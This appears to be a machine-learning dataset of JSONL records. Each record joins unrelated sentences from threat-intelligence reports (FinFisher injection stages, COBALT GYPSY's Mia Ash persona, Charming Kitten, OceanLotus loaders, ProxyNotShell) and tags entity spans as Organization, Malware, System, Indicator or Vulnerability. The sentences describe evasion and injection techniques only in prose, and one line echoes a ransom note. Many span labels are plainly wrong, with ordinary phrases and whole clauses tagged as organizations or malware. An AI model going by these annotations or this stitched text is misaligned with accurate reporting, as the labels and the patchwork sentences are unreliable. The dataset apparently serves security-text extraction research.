Ultimately , APT35 had used access to hundreds of mailboxes to read email communications and steal data related to Middle East organizations , which later became victims of destructive attacks . The way the decryption routine is called ( from within the DllMain function , as opposed to an exported function ) . KillNet has also repeatedly promoted messaging related to changes or expansions in the collective \u2019s operations , ranging from KillNet reforming to become a \u201c private military hacker company \u201d to purported partnerships with cyber crime groups .", "spans": [{"start": 4, "end": 20, "label": "Indicator"}, {"start": 148, "end": 153, "label": "Organization"}, {"start": 203, "end": 223, "label": "Organization"}, {"start": 389, "end": 396, "label": "System"}, {"start": 574, "end": 581, "label": "Organization"}]} {"text": "In the case of 32-bit systems , the malware may attempt a known UAC bypass by launching printui.exe system process and using token manipulation with NtFilterToken as described in this blog post . CTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash . The way the payload is invoked ( by overwriting the return address on the stack , as opposed to a direct call ) . The Talos Threat Spotlight posts and Quarterly Trends reports provide details of threats and the techniques used by threat actors .", "spans": [{"start": 88, "end": 99, "label": "Indicator"}, {"start": 196, "end": 199, "label": "Organization"}, {"start": 346, "end": 358, "label": "Organization"}, {"start": 374, "end": 381, "label": "Organization"}, {"start": 502, "end": 507, "label": "Organization"}]} {"text": "Installation process with administrative privilege This installation method is more interesting because it reveals how the malware tries to achieve stealthier persistence on the machine . 
Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims . Implementation of an additional anti-analysis check that compares the name of the parent process to a string stored in an encrypted resource . The opportunities for governments and law enforcement to use spyware as part of legal investigations led to the development of commercial spyware .", "spans": [{"start": 252, "end": 264, "label": "Organization"}, {"start": 298, "end": 309, "label": "Malware"}, {"start": 314, "end": 344, "label": "Malware"}, {"start": 512, "end": 523, "label": "Organization"}, {"start": 528, "end": 543, "label": "Organization"}, {"start": 617, "end": 635, "label": "System"}]} {"text": "The method is a well-known trick used by penetration testers that was automated and generalized by FinFisher The procedure starts by enumerating the KnownDlls object directory and then scanning for section objects of the cached system DLLs . COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites . We came across multiple variations of this DLL containing different parent process names , possibly targeted specifically to the victim\u2019s environment . 
then the data decoded with Base64 and sent to C2 server IP using POST request to the subdirectory .", "spans": [{"start": 99, "end": 108, "label": "Malware"}, {"start": 242, "end": 254, "label": "Organization"}, {"start": 288, "end": 306, "label": "Organization"}, {"start": 309, "end": 319, "label": "Organization"}, {"start": 322, "end": 329, "label": "Organization"}, {"start": 332, "end": 335, "label": "Organization"}, {"start": 342, "end": 374, "label": "Organization"}, {"start": 433, "end": 451, "label": "Organization"}, {"start": 460, "end": 472, "label": "Organization"}, {"start": 524, "end": 527, "label": "System"}, {"start": 638, "end": 675, "label": "Malware"}, {"start": 679, "end": 691, "label": "System"}, {"start": 698, "end": 710, "label": "System"}]} {"text": "Next , the malware enumerates all .exe programs in the % System % folder and looks for an original signed Windows binary that imports from at least one KnownDll and from a library that is not in the KnownDll directory . The connections associated with these profiles indicate the threat actor began using the persona to target organizations in April 2016 . 
Some of these names include processes related to security software : Ashley Madison \u2019s long - suspected army of fake female accounts came to the fore in August 2012 after the former sex worker turned activist and blogger Maggie McNeill published screenshots apparently taken from Ashley Madison \u2019s internal systems suggesting that a large percentage of the female accounts on the service were computer - operated bots .", "spans": [{"start": 106, "end": 113, "label": "System"}, {"start": 280, "end": 292, "label": "Organization"}, {"start": 426, "end": 440, "label": "Organization"}, {"start": 578, "end": 592, "label": "Organization"}, {"start": 637, "end": 671, "label": "System"}, {"start": 714, "end": 729, "label": "Organization"}]} {"text": "When a suitable .exe file candidate is found , it is copied into the malware installation folder ( for example , C : \\ProgramData ) . Between December 28 , 2016 and January 1 , 2017 , CTU researchers observed a phishing campaign targeting Middle Eastern organizations . wsc_proxy.exe plugins-setup.exe SoftManager.exe GetEFA.exe . Rhysida appears to have first popped up back in May , with several high - profile compromises posted on their leak site .", "spans": [{"start": 113, "end": 129, "label": "Indicator"}, {"start": 184, "end": 187, "label": "Organization"}, {"start": 270, "end": 283, "label": "Indicator"}, {"start": 284, "end": 301, "label": "Indicator"}, {"start": 302, "end": 317, "label": "Indicator"}, {"start": 318, "end": 328, "label": "Indicator"}, {"start": 331, "end": 338, "label": "Malware"}]} {"text": "At this point the malware extracts and decrypts a stub DLL from its own resources ( ID 101 ) . The macro ran a PowerShell command that attempted to download additional PowerShell loader scripts for PupyRAT , a research and penetration-testing tool that has been used in attacks . 
Features : Do you have cyber security concerns about your business Contact CoreTech today , and we will conduct an IT security assessment .", "spans": [{"start": 111, "end": 129, "label": "System"}, {"start": 148, "end": 193, "label": "Malware"}, {"start": 198, "end": 205, "label": "System"}, {"start": 210, "end": 247, "label": "System"}, {"start": 355, "end": 363, "label": "Organization"}]} {"text": "It then calls a routine that adds a code section to a target module . The survey contained macros that , once enabled , downloaded PupyRAT . Side-loaded DLL Anti-debugging/anti-sandboxing check for parent process name . Why does this matter Because nation states are well funded and super determined .", "spans": [{"start": 131, "end": 138, "label": "System"}, {"start": 153, "end": 156, "label": "System"}, {"start": 249, "end": 262, "label": "Organization"}]} {"text": "This section will contain a fake export table mimicking the same export table of the original system DLL chosen . CTU researchers determined that the COBALT GYPSY threat group orchestrated this activity due to the tools , techniques , and procedures ( TTPs ) used in both campaigns . Loads next-stage payload using custom .png steganography . Further analysis of COSMICENERGY is available as part of .", "spans": [{"start": 114, "end": 117, "label": "Organization"}, {"start": 150, "end": 162, "label": "Organization"}, {"start": 163, "end": 175, "label": "Organization"}, {"start": 315, "end": 340, "label": "System"}, {"start": 363, "end": 375, "label": "Malware"}]} {"text": "At the time of writing , the dropper supports aepic.dll , sspisrv.dll , ftllib.dll , and userenv.dll to host the malicious FinFisher payload . The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents . Uses AES128 implementation from Crypto++ library for payload decryption . 
We were able to find additional links between Hack520 \u2019s \u201c Pig network \u201d and the Winnti group \u2019s activities .", "spans": [{"start": 46, "end": 55, "label": "Indicator"}, {"start": 58, "end": 69, "label": "Indicator"}, {"start": 72, "end": 82, "label": "Indicator"}, {"start": 89, "end": 100, "label": "Indicator"}, {"start": 123, "end": 132, "label": "Malware"}, {"start": 179, "end": 191, "label": "Organization"}, {"start": 222, "end": 231, "label": "Organization"}, {"start": 333, "end": 349, "label": "System"}, {"start": 421, "end": 428, "label": "Organization"}, {"start": 434, "end": 445, "label": "System"}, {"start": 456, "end": 468, "label": "Organization"}]} {"text": "Finally , a new Windows service is created with the service path pointing to the candidate .exe located in this new directory together with the freshly created , benign-looking DLL . The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT . Executes the payload by overwriting the return address on the stack . The dropper first creates a shortcut file but the dropped DLL is launched with rundll32.exe instead of regsvr32.exe .", "spans": [{"start": 16, "end": 23, "label": "System"}, {"start": 187, "end": 192, "label": "Organization"}, {"start": 213, "end": 225, "label": "Organization"}, {"start": 372, "end": 376, "label": "System"}, {"start": 385, "end": 392, "label": "System"}, {"start": 530, "end": 556, "label": "Indicator"}, {"start": 557, "end": 580, "label": "Indicator"}]} {"text": "In this way , when the service runs during boot , the original Windows executable is executed from a different location and it will automatically load and map the malicious DLL inside its address space , instead of using the genuine system library . 
By compromising a user account that has administrative or elevated access , Magic Hound can quickly access a targeted environment to achieve their objectives . Known to load an updated version of Remy backdoor . For operational plans development , the combination of threats , vulnerabilities , and impacts must be evaluated in order to identify important trends and decide where effort should be applied to eliminate or reduce threat capabilities eliminate or reduce vulnerabilities and assess , coordinate , and deconflict all cyberspace operations NIST , 2010 .", "spans": [{"start": 63, "end": 70, "label": "System"}, {"start": 446, "end": 459, "label": "Malware"}]} {"text": "This routine is a form of generic and variable generator of DLL side-loading combinations . These characteristics suggest that COBALT GYPSY executed the January and February phishing campaigns and that it created the Mia Ash persona . This DLL does not contain an export table and its entire functionality resides in the DllMain routine . \u2022 None consisting of CVE-2022 - 41080 and CVE-2022 - 41082 to achieve remote code execution ( RCE ) through Outlook Web Access ( OWA ) .", "spans": [{"start": 127, "end": 139, "label": "Organization"}, {"start": 217, "end": 224, "label": "Organization"}, {"start": 240, "end": 243, "label": "System"}, {"start": 321, "end": 328, "label": "System"}, {"start": 360, "end": 376, "label": "Vulnerability"}, {"start": 381, "end": 397, "label": "Vulnerability"}, {"start": 447, "end": 473, "label": "System"}]} {"text": "Figure 10 . CTU researchers have observed multiple COBALT GYPSY campaigns since 2015 and consider it highly likely that the group is associated with Iranian government-directed cyber operations . Upon execution , the malware will first decrypt a string from its resources and compare it against the name of the parent process . 
During the course of researching the Winnti group , we came across previously unreported malware samples that we attributed to the group based on the malware arsenal and the use of registered domains as attack infrastructure .", "spans": [{"start": 12, "end": 15, "label": "Organization"}, {"start": 124, "end": 129, "label": "Organization"}, {"start": 365, "end": 377, "label": "Organization"}, {"start": 395, "end": 432, "label": "Malware"}, {"start": 478, "end": 493, "label": "Malware"}, {"start": 509, "end": 527, "label": "System"}]} {"text": "Windows Defender ATP timeline can pinpoint the service DLL side-loading trick ( in this example , using fltlib.dll ) . The use of the Mia Ash persona demonstrates the creativity and persistence that threat actors employ to compromise targets . If the names differ , the malware will simply exit without touching the payload . If you receive such an email , just delete it and do n\u2019t give it a second thought .", "spans": [{"start": 0, "end": 20, "label": "System"}, {"start": 104, "end": 114, "label": "Indicator"}, {"start": 134, "end": 141, "label": "System"}, {"start": 199, "end": 212, "label": "Organization"}]} {"text": "In the past , we have seen other activity groups like LEAD employ a similar attacker technique named \u201c proxy-library \u201d to achieve persistence , but not with this professionalism . CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering . The resource containing the expected process name ( ICON/1 ) is XORed with the first byte of the legitimate C:\\Windows\\system.ini file \u2013 0x3B ( \" ; \" ) . 
[ As the documentary points out , the domain AshleyMadisonSucks.com was eventually transferred to Ashley Madison , which then shrewdly used it for advertising and to help debunk theories about why its service was supposedly untrustworthy ] .", "spans": [{"start": 180, "end": 183, "label": "Organization"}, {"start": 210, "end": 222, "label": "Organization"}, {"start": 305, "end": 323, "label": "Organization"}, {"start": 434, "end": 455, "label": "Indicator"}, {"start": 514, "end": 717, "label": "Organization"}]} {"text": "The said technique brings the advantage of avoiding auto-start extensibility points ( ASEP ) scanners and programs that checks for binaries installed as service ( for the latter , the service chosen by FinFisher will show up as a clean Windows signed binary ) . The persistent use of social media to identify and manipulate victims indicates that COBALT GYPSY successfully achieves its objectives using this tactic . If the parent name matches , the malware will traverse the stack in order to find a return address that falls into the memory of the parent process\u2019s text section . A Systemd service unit allows for a program to be run under certain conditions , and in this case , it was used to execute the GOGETTER binary on reboot .", "spans": [{"start": 202, "end": 211, "label": "Malware"}, {"start": 236, "end": 243, "label": "System"}, {"start": 284, "end": 296, "label": "Organization"}, {"start": 347, "end": 359, "label": "Organization"}, {"start": 709, "end": 734, "label": "Malware"}]} {"text": "The malware cleans the system event logs using OpenEventLog/ClearEventLog APIs , and then terminates the setup procedure with a call to StartService to run the stage 4 malware . COBALT GYPSY 's continued social media use reinforces the importance of recurring social engineering training . Next , the payload is read from the .png cover file , which seems to have been taken from an inspirational quotes website3 . 
In the case of ProxyNotShell , the targeted backend service is the Remote PowerShell service .", "spans": [{"start": 178, "end": 190, "label": "Organization"}, {"start": 204, "end": 216, "label": "Organization"}, {"start": 260, "end": 278, "label": "Organization"}, {"start": 430, "end": 443, "label": "System"}, {"start": 482, "end": 507, "label": "System"}]} {"text": "Figure 11 . SecureWorks Counter Threat Unit ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 . In this instance , the payload is fully contained within the image\u2019s pixel color codes , leaving no remaining data beyond the IEND marker . DOUBLEDRAG attempts to download a second - stage obfuscated PowerShell memory - only dropper , which Mandiant tracks as DOUBLEDROP , that will launch a backdoor into memory .", "spans": [{"start": 12, "end": 43, "label": "Organization"}, {"start": 46, "end": 49, "label": "Organization"}, {"start": 124, "end": 136, "label": "Organization"}, {"start": 301, "end": 311, "label": "System"}, {"start": 402, "end": 410, "label": "Organization"}, {"start": 421, "end": 431, "label": "System"}]} {"text": "The DLL side-loaded stage 4 malware mimicking a real export table to avoid detection Stage 4 : The memory loader \u2013 Fun injection with GDI function hijacking Depending on how stage 4 was launched , two different things may happen : In the low-integrity case ( under UAC ) the installer simply injects the stage 5 malware into the bogus explorer.exe process started earlier and terminates In the high-integrity case ( with administrative privileges or after UAC bypass ) , the code searches for the process hosting the Plug and Play service ( usually svchost.exe SecureWorks\u00ae Counter Threat Unit\u2122 ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 . 
Finally , the loader will decrypt the payload to a memory buffer and overwrite the previously found return address with the pointer to that buffer , ensuring that the malicious shellcode will be executed when the DLL attempts to return to the caller . Examples of indicators of attack , and why they matter", "spans": [{"start": 335, "end": 347, "label": "Indicator"}, {"start": 549, "end": 560, "label": "Indicator"}, {"start": 561, "end": 594, "label": "Organization"}, {"start": 597, "end": 600, "label": "Organization"}, {"start": 675, "end": 687, "label": "Organization"}, {"start": 925, "end": 928, "label": "System"}, {"start": 976, "end": 996, "label": "Indicator"}]} {"text": ") loaded in memory and injects itself into it For the second scenario , the injection process works like this : The malware opens the target service process . CTU analysis suggests this activity is related to Iranian threat actors closely aligned with or acting on behalf of the COBALT GYPSY threat group ( formerly labeled Threat Group-2889 ) . The loader embedded in the payload seems to be a variant of the Veil \" shellcode_inject \" payload , previously used by OceanLotus to load older versions of Remy backdoor . the malware uses and to get the function Address .", "spans": [{"start": 159, "end": 162, "label": "Organization"}, {"start": 217, "end": 230, "label": "Organization"}, {"start": 279, "end": 291, "label": "Organization"}, {"start": 292, "end": 304, "label": "Organization"}, {"start": 324, "end": 341, "label": "Organization"}, {"start": 410, "end": 414, "label": "System"}, {"start": 417, "end": 433, "label": "System"}, {"start": 465, "end": 475, "label": "Organization"}, {"start": 502, "end": 515, "label": "Malware"}, {"start": 518, "end": 529, "label": "Malware"}]} {"text": "It allocates and fills four chunks of memory inside the service process . 
Since early 2014 , an attacker group of Iranian origin has been actively targeting persons of interest by means of malware infection , supported by persistent spear phishing campaigns . In this instance , the shellcode is configured to load an encoded backdoor from within the payload . OT asset owners leveraging IEC-104 compliant devices should take action to preempt potential in the wild deployment of COSMICENERGY .", "spans": [{"start": 96, "end": 110, "label": "Organization"}, {"start": 361, "end": 376, "label": "Organization"}, {"start": 388, "end": 413, "label": "System"}, {"start": 480, "end": 492, "label": "Malware"}]} {"text": "One chunk contains the entire malware DLL code ( without PE headers ) . This cyber-espionage group was dubbed ' Rocket Kitten ' , and remains active as of this writing , with reported attacks as recent as October 2015 . The final payload comes in a form of a launcher DLL that contains an encrypted backdoor in its .rdata section and a plain-text configuration in its resources . Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers , plus he 's accused of making ransom demands through deploying ransomware .", "spans": [{"start": 77, "end": 98, "label": "Organization"}, {"start": 112, "end": 125, "label": "Organization"}, {"start": 268, "end": 271, "label": "System"}, {"start": 380, "end": 389, "label": "Organization"}]} {"text": "Another chunk is used to copy a basic Ntdll and Kernel32 import address table . Characterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East ( including targets inside Iran itself ) , as well as across Europe and in the United States . The resources also store one or more C2 communication modules . 
There is another important point we stole a fairly large amount of sensitive data from your local network financial documents personal information of your employees , customers , partners work documentation , postal correspondence and much more .", "spans": [{"start": 108, "end": 139, "label": "System"}, {"start": 384, "end": 386, "label": "System"}]} {"text": "Two chunks are filled with an asynchronous procedure call ( APC ) routine code and a stub . The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) . The backdoor DLL and the C2 communication DLLs are heavily obfuscated using high quantities of junk code , which significantly inflates their size and makes both static analysis and debugging more difficult . Wind farms in central Europe and internet users were also affected .", "spans": [{"start": 166, "end": 179, "label": "Organization"}, {"start": 197, "end": 210, "label": "Organization"}, {"start": 228, "end": 241, "label": "Organization"}, {"start": 247, "end": 258, "label": "Organization"}, {"start": 313, "end": 323, "label": "Organization"}, {"start": 404, "end": 407, "label": "System"}, {"start": 416, "end": 418, "label": "System"}, {"start": 600, "end": 610, "label": "Organization"}, {"start": 614, "end": 628, "label": "Organization"}, {"start": 633, "end": 647, "label": "Organization"}]} {"text": "It opens the service thread of the service process and uses the ZwQueueApcThread native API to inject an APC . An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) . 
In addition to Denes and Remy backdoors , at least two different communication modules were observed with different versions of this launcher \u2013 DNSProvider and HTTPProv . The ThreatConnect Platform also offers workflows and lowcode automation to automate the analysis and response process of reported emails .", "spans": [{"start": 64, "end": 80, "label": "Indicator"}, {"start": 122, "end": 135, "label": "Organization"}, {"start": 151, "end": 164, "label": "Organization"}, {"start": 180, "end": 193, "label": "Organization"}, {"start": 199, "end": 210, "label": "Organization"}, {"start": 265, "end": 275, "label": "Organization"}, {"start": 358, "end": 363, "label": "Malware"}, {"start": 368, "end": 382, "label": "Malware"}, {"start": 487, "end": 498, "label": "System"}, {"start": 503, "end": 511, "label": "System"}, {"start": 518, "end": 540, "label": "System"}]} {"text": "The APC routine creates a thread in the context of the svchost.exe process that will map and execute the stage 5 malware into the winlogon.exe process . The report specifies the Magic Hound targeted political , military and defense industry in the US , UK and Israel . The launcher binary , which contains the final backdoor , is RC4 encrypted and wrapped in a layer of obfuscated shellcode . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": [{"start": 55, "end": 66, "label": "Indicator"}, {"start": 130, "end": 142, "label": "Indicator"}, {"start": 199, "end": 208, "label": "Organization"}, {"start": 211, "end": 219, "label": "Organization"}, {"start": 224, "end": 240, "label": "Organization"}]} {"text": "The injection method used for winlogon.exe is also interesting and quite unusual . 
ClearSky 's September 2014 blog post first described active attacks using a piece of malware they dubbed ' Gholee ' ( as appears in a malicious payload export function , potentially named after a popular Iranian singer9 ) . We can see the familiar DOS stub in plain text , but the rest of the header and binary body are encrypted . We have been documenting it recently and are reporting the abuse to Cloudflare which it uses to hide its real infrastructure .", "spans": [{"start": 30, "end": 42, "label": "Indicator"}, {"start": 83, "end": 91, "label": "Organization"}, {"start": 190, "end": 196, "label": "System"}, {"start": 483, "end": 493, "label": "System"}]} {"text": "We believe that this method is engineered to avoid trivial detection of process injection using the well-detected CreateRemoteThread or ZwQueueApcThread API . The Rocket Kitten attacker group 's main attack vector is spear-phishing . The shellcode is obfuscated using OceanLotus \u2019s standard approach of flattening the control flow and inserting junk opcodes ( as described in the ESET white paper on OceanLotus ) . 
For example , analysts need to consider during analysis whether the appliance is recording the true client IP addresses ( opposed to network address translation [ NAT ] addresses ) , and what normal user behavior looks like ( do users shift IP addresses frequently ) .", "spans": [{"start": 114, "end": 132, "label": "Indicator"}, {"start": 136, "end": 152, "label": "Indicator"}, {"start": 163, "end": 176, "label": "Organization"}, {"start": 177, "end": 191, "label": "Organization"}, {"start": 268, "end": 278, "label": "Organization"}, {"start": 380, "end": 384, "label": "Organization"}, {"start": 400, "end": 410, "label": "Organization"}]} {"text": "The malware takes these steps : Check if the system master boot record ( MBR ) contains an infection marker ( 0xD289C989C089 8-bytes value at offset 0x2C ) , and , if so , terminate itself Check again if the process is attached to a debugger ( using the techniques described previously ) Read , decrypt , and map the stage 5 malware ( written in the previous stage in msvcr90.dll ) Open winlogon.exe process Load user32.dll system library and read the KernelCallbackTable After learning of an active attack incident from the Rocket Kitten group on a customer network , Check Point researchers decided to actively join the investigation . The shellcode starts in a fairly standard way \u2013 by walking the list of loaded modules in order to find the base of kernel32.dll library . 
It is accessed using a path confusion exploit , CVE-2022 - 41040 , allowing the attacker to reach the backend for arbitrary URLs .", "spans": [{"start": 110, "end": 124, "label": "Indicator"}, {"start": 368, "end": 379, "label": "Indicator"}, {"start": 387, "end": 399, "label": "Indicator"}, {"start": 413, "end": 423, "label": "Indicator"}, {"start": 452, "end": 471, "label": "Indicator"}, {"start": 525, "end": 544, "label": "Organization"}, {"start": 569, "end": 580, "label": "Organization"}, {"start": 753, "end": 765, "label": "Indicator"}, {"start": 824, "end": 840, "label": "Vulnerability"}]} {"text": "pointer from its own process environment block ( PEB ) ( Note : The KernelCallbackTable points to an array of graphic functions used by Win32 kernel subsystem module win32k.sys as call-back into user-mode . As described in previous publications , the Rocket Kitten attackers make extensive use of various phishing schemes . Once kernel32 base is found , the shellcode will calculate the addresses of LoadLibraryA and GetProcAddress functions , and use them to resolve other necessary APIs , which include VirtualAlloc , RtlMoveMemory , and RtlZeroMemory . Further analyses of these similarities are available via Mandiant Advantage .", "spans": [{"start": 166, "end": 176, "label": "Indicator"}, {"start": 251, "end": 264, "label": "Organization"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 329, "end": 337, "label": "System"}, {"start": 400, "end": 412, "label": "System"}, {"start": 417, "end": 431, "label": "System"}, {"start": 484, "end": 488, "label": "System"}, {"start": 505, "end": 517, "label": "System"}, {"start": 520, "end": 533, "label": "System"}, {"start": 540, "end": 553, "label": "System"}, {"start": 613, "end": 631, "label": "Organization"}]} {"text": ") Calculate the difference between this pointer and the User32 base address . 
While the recent paper from Trend Micro and ClearSky ( ' The Spy Kittens Are Back : Rocket Kitten 2 ' ) does extensively cover the campaign 's narrative , we aimed to seek confirmation that our analyzed attack was positively connected to the same campaign and set out to provide additional value and insight . After resolving the APIs , the shellcode will decrypt the launcher binary and load it to the memory . None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": [{"start": 106, "end": 117, "label": "Organization"}, {"start": 122, "end": 130, "label": "Organization"}, {"start": 139, "end": 150, "label": "Organization"}, {"start": 162, "end": 175, "label": "Organization"}, {"start": 408, "end": 412, "label": "System"}, {"start": 640, "end": 665, "label": "Organization"}]} {"text": "Copy the stage 5 DLL into winlogon.exe Allocate a chunk of memory in winlogon.exe process and copy the same APC routine seen previously Read and save the original pointer of the __fnDWORD internal User32 routine ( located at offset +0x10 of the KernelCallbackTable ) and replace this pointer with the address of the APC stub routine After this function pointer hijacking , when winlogon.exe makes any graphical call ( GDI ) , the malicious code can execute without using CreateRemoteThread or As the Rocket Kitten group 's behavior was well characterized in previous publications ( see the recent report from Trend Micro and ClearSky ) . MZ header , PE header , as well as each section and their header , are decrypted separately using RC4 algorithm and a hardcoded key . 
UNC2529 has also used weaponized Microsoft Excel documents as a first stage downloader .", "spans": [{"start": 26, "end": 38, "label": "Indicator"}, {"start": 69, "end": 81, "label": "Indicator"}, {"start": 378, "end": 390, "label": "Indicator"}, {"start": 500, "end": 519, "label": "Organization"}, {"start": 609, "end": 620, "label": "Organization"}, {"start": 625, "end": 633, "label": "Organization"}, {"start": 736, "end": 739, "label": "System"}, {"start": 772, "end": 779, "label": "Organization"}, {"start": 780, "end": 858, "label": "Malware"}]} {"text": "similar triggers that are easily detectable . Magic Hound will often find simpler ways for effective compromise , such as creative phishing and simple custom malware . Once all sections are loaded , the relocations get fixed and the MZ/PE headers are zeroed out in memory . It is entirely possible that these threat actors will go as far as compromising close contacts of their targets .", "spans": [{"start": 309, "end": 322, "label": "Organization"}]} {"text": "After execution it takes care of restoring the original KernelCallbackTable . We present the connection between Behzad Mesri , an Iranian national recently indicted for his involvement in hacking HBO , and Charming Kitten . The shellcode then proceeds to execute the payload DLL\u2019s entry point . 
It also reveals direct links to secure[.]66[.]to and zhu[.]vn , both of which also belong to Hack520 and contains his personal blog .", "spans": [{"start": 112, "end": 124, "label": "Organization"}, {"start": 206, "end": 221, "label": "Organization"}, {"start": 327, "end": 343, "label": "Indicator"}, {"start": 348, "end": 356, "label": "Indicator"}, {"start": 388, "end": 395, "label": "Organization"}]} {"text": "Stage 5 : The final loader takes control The stage 5 malware is needed only to provide one more layer of obfuscation , through the VM , of the final malware payload and to set up a special Structured Exception Hander routine , which is inserted as Wow64PrepareForException in Ntdll . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as Oilrig1 and CopyKittens2 . The Internal name of this DLL is a randomly looking CLSID and it only exports one function called DllEntry . When exploiting these flaws , the threat actor almost always deploys a tunneling tool , the most common of which are Fast Reverse Proxy Client FRPC and Plink .", "spans": [{"start": 496, "end": 509, "label": "Organization"}, {"start": 520, "end": 527, "label": "Organization"}, {"start": 532, "end": 544, "label": "Organization"}, {"start": 573, "end": 576, "label": "System"}, {"start": 599, "end": 604, "label": "System"}, {"start": 645, "end": 653, "label": "System"}, {"start": 678, "end": 683, "label": "Vulnerability"}, {"start": 690, "end": 702, "label": "Organization"}, {"start": 727, "end": 741, "label": "System"}, {"start": 773, "end": 803, "label": "System"}, {"start": 808, "end": 813, "label": "System"}]} {"text": "This special exception handler is needed to manage some memory buffers protection and special exceptions that are used to provide more stealthy execution . 
A case of these obscure lines can be found in a blogpost published in coordination and parallel to this report - \" Flying Kitten to Rocket Kitten , A Case of Ambiguity and Shared Code \" 3 by Collin Anderson and Claudio Guarnieri . Upon execution , the launcher will attempt to hook legitimate wininet.dll library by overwriting its entry point in memory with the address of a malicious routine . During the course of researching the Winnti group , we came across previously unreported malware samples that we attributed to the group based on the malware arsenal and the use of registered domains as attack infrastructure .", "spans": [{"start": 271, "end": 284, "label": "Organization"}, {"start": 288, "end": 301, "label": "Organization"}, {"start": 449, "end": 460, "label": "Indicator"}, {"start": 589, "end": 601, "label": "Organization"}, {"start": 619, "end": 656, "label": "Malware"}, {"start": 702, "end": 717, "label": "Malware"}, {"start": 733, "end": 751, "label": "System"}]} {"text": "After the VM code has checked again the user environment , it proceeds to extract and execute the final un-obfuscated payload sample directly into winlogon.exe ( alternatively , into explorer.exe ) process . FireEye 's publication of \" Operation Saffron Rose \" report , which described Flying Kitten 's operations against aviation firms , led to the dismantling of Flying Kitten 's infrastructure and the apparent end of its activities . If successful , every time the system loads wininet.dll , the entry point of the subsequently dropped backdoor DLL will be executed before the original wininet entry point . 
They have employed many unique capabilities , including gaining initial access through a software supply chain vulnerability .", "spans": [{"start": 147, "end": 159, "label": "Indicator"}, {"start": 183, "end": 195, "label": "Indicator"}, {"start": 208, "end": 215, "label": "Organization"}, {"start": 286, "end": 299, "label": "Organization"}, {"start": 322, "end": 336, "label": "Organization"}, {"start": 365, "end": 378, "label": "Organization"}, {"start": 482, "end": 493, "label": "Indicator"}, {"start": 549, "end": 552, "label": "System"}, {"start": 622, "end": 690, "label": "Organization"}, {"start": 701, "end": 736, "label": "Vulnerability"}]} {"text": "After the payload is extracted , decrypted , and mapped in the process memory , the malware calls the new DLL entry point , and then the RunDll exported function . To sum up , the HBO hacker - Behzad Mesri is a member of Turk Black Hat along with ArYaIeIrAn , who provides infrastructure for Charming Kitten activity via PersianDNS / Mahanserver together with Mohammad Rasoul Akbari , who is a Facebook friend of Behzad Mesri 's . There is no proper DLL injection routine \u2013 the payload is just decompressed to the memory as-is \u2013 so the malware needs to fix all the pointers in the decompressed code , which is done on a one-by-one basis using hardcoded values and offsets . 
The output is then executed using and the return value is checked to determine the functions return value , if it is 0 , return 0 if not , it will call twice", "spans": [{"start": 184, "end": 190, "label": "Organization"}, {"start": 193, "end": 205, "label": "Organization"}, {"start": 221, "end": 235, "label": "Organization"}, {"start": 247, "end": 257, "label": "Organization"}, {"start": 321, "end": 331, "label": "System"}, {"start": 334, "end": 345, "label": "System"}, {"start": 394, "end": 402, "label": "Organization"}, {"start": 413, "end": 425, "label": "Organization"}, {"start": 450, "end": 453, "label": "System"}, {"start": 688, "end": 810, "label": "Malware"}]} {"text": "The latter implements the entire spyware program . Charming kitten regularly target international media outlets with Persian-language services . This part takes 90% of the whole launcher code and includes over 11 , 000 modifications . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked \u201c exploitation more likely . \u201d", "spans": [{"start": 51, "end": 66, "label": "Organization"}, {"start": 98, "end": 103, "label": "Organization"}, {"start": 248, "end": 264, "label": "Vulnerability"}, {"start": 339, "end": 355, "label": "Vulnerability"}]} {"text": "Stage 6 : The payload is a modular spyware framework for further analysis Our journey to deobfuscating FinFisher has allowed us to uncover the complex anti-analysis techniques used by this malware , as well as to use this intel to protect our customers , which is our top priority . It was a decoy to make visitor download a \" Flash Player \" , which was in fact DownPaper malware , analyzed later in this report . The launcher then calls the backdoor DLL\u2019s entry point . 
